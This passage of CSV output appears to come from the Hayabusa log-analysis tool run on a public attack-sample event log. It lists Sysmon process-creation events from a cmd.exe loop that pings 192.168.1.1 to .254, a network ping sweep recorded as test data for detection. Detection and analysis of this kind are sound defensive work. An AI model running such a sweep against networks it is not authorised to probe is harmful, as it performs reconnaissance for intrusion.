747F3D96-D936-5D31-0000-00102EC73500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.129 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6540 | PGUID: 747F3D96-D936-5D31-0000-001075CA3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.130 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4324 | PGUID: 747F3D96-D937-5D31-0000-001066CD3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.131 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D938-5D31-0000-001072D03500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.132 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" 
| LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D938-5D31-0000-00105ED33500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.133 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D938-5D31-0000-00101EDC3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.134 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1816 | PGUID: 747F3D96-D939-5D31-0000-001090E23500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.135 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3320 | PGUID: 747F3D96-D939-5D31-0000-001072EB3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.136 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4540 | PGUID: 747F3D96-D93A-5D31-0000-001073EE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.137 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-D93A-5D31-0000-00105FF83500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.478 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.138 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1248 | PGUID: 747F3D96-D93B-5D31-0000-001085FB3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.139 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6740 | PGUID: 747F3D96-D93B-5D31-0000-001092FE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.140 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D93C-5D31-0000-0010B5053600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.141 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D93C-5D31-0000-0010B1083600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.142 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D93D-5D31-0000-0010A20B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.143 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D93D-5D31-0000-0010910E3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.144 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D93E-5D31-0000-00107E113600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.145 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D93E-5D31-0000-0010FC153600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.146 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D93F-5D31-0000-001041203600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.147 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D93F-5D31-0000-001061233600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.148 | 
Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D940-5D31-0000-00104E263600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.149 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2136 | PGUID: 747F3D96-D941-5D31-0000-00103C293600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.150 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-D941-5D31-0000-0010282C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.151 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D942-5D31-0000-0010142F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.152 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3712 | PGUID: 747F3D96-D942-5D31-0000-001013323600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.153 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 640 | PGUID: 747F3D96-D943-5D31-0000-0010FF343600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.154 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D943-5D31-0000-0010EB373600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.155 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D944-5D31-0000-0010D73A3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:52.553 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.156 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D944-5D31-0000-00109E433600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.157 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D945-5D31-0000-0010A2463600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.158 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2168 | PGUID: 747F3D96-D945-5D31-0000-0010A2493600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.159 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1664 | PGUID: 
747F3D96-D946-5D31-0000-0010904C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.160 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D946-5D31-0000-00107C4F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.161 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D946-5D31-0000-001068523600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.162 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D947-5D31-0000-001068553600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.163 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" 
| LID: 0x50951 | PID: 6332 | PGUID: 747F3D96-D948-5D31-0000-001054583600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.164 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4368 | PGUID: 747F3D96-D948-5D31-0000-0010405B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.165 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5480 | PGUID: 747F3D96-D948-5D31-0000-00102C5E3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.166 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5316 | PGUID: 747F3D96-D949-5D31-0000-0010F3663600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.167 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D94A-5D31-0000-0010E8693600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.168 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6544 | PGUID: 747F3D96-D94A-5D31-0000-0010D76C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.169 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6300 | PGUID: 747F3D96-D94B-5D31-0000-0010CD6F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.170 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D94B-5D31-0000-0010B9723600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.171 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4032 | PGUID: 747F3D96-D94C-5D31-0000-0010BA763600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.172 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1604 | PGUID: 747F3D96-D94C-5D31-0000-0010B9793600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.173 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1596 | PGUID: 747F3D96-D94D-5D31-0000-0010EB853600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.174 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5952 | PGUID: 747F3D96-D94D-5D31-0000-0010D9883600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.175 | Process: C:\Windows\System32\PING.EXE 